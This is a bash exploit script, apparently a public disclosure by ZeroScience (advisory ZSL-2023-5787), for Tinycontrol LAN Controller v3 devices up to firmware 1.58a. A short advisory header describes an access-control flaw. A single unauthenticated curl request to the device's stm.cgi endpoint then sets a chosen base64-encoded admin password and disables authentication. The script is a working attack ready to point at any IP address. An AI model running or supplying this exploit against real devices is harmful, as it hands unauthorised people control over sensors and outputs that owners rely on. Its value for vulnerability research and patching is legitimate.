Tinycontrol LAN Controller 3 Remote Admin Password Change

#!/bin/bash: "Tinycontrol LAN Controller v3 (LK3) Remote Admin Password ChangeVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The application suffers from an insecure accesscontrol allowing an unauthenticated attacker tochange accounts passwords and bypass authenticationgaining panel control access.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5787Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php18.08.2023"set -euo pipefailIFS=$'\n\t'if [ $# -ne 2 ]; then    echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'    exitfiIP=$1PW=$2EN=$(echo -n $PW | base64)curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/echo -ne '\nAdmin password changed to: '$PW